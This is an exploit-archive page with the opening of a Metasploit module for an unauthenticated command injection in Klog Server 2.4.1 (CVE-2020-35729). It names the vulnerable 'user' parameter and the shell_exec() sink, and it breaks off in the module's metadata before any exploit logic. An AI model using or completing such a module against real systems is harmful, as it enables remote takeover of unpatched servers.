Klog server 2.4.1 unauthenticated command injection (metasploit) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-01-25 | Type : webapps | Platform : php
This exploit / vulnerability, Klog server 2.4.1 unauthenticated command injection (metasploit), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
        The "user" parameter is executed via the shell_exec() function without input validation.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'B3KC4T', # Vulnerability discovery
          'Metin Yunus Kandemir', # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2020-35729'],
          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
        ],